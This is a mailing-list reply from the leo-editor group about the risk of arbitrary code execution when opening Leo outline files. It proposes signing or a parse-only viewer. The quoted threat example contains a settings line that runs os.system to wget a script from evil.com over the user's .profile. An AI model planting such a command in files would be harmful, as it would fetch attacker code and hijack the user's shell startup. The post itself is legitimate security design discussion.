On Mon, Jul 6, 2009 at 10:25 PM, thyrsus<[email protected]> wrote:
> Before we implement this as documented, suppose I clicked on the
> attachment someone sent me (Hey! It claimed it was from
> [email protected]!) containing a leo file with
>
> @settings
> �...@if exec('import os; os.system("wget -O $HOME/.profile
> http://www.evil.com/spam_the_world.sh";)')
> �...@bool fubar=True
We also have {{ }} for evaluating paths that can execute arbitrary
code. I suppose there is no way to make a leo file "safe" - opening a
leo file could be considered equivalent to running a script on your
computer.
Signing leo docs with gpg could be a decent cop-out...
Or implementing a dumb "leo viewer" that parsed the sax, read in the
external files, and did nothing more.
--
Ville M. Vainio
http://tinyurl.com/vainio
--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups
"leo-editor" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[email protected]
For more options, visit this group at
http://groups.google.com/group/leo-editor?hl=en
-~----------~----~----~----~------~----~------~--~---
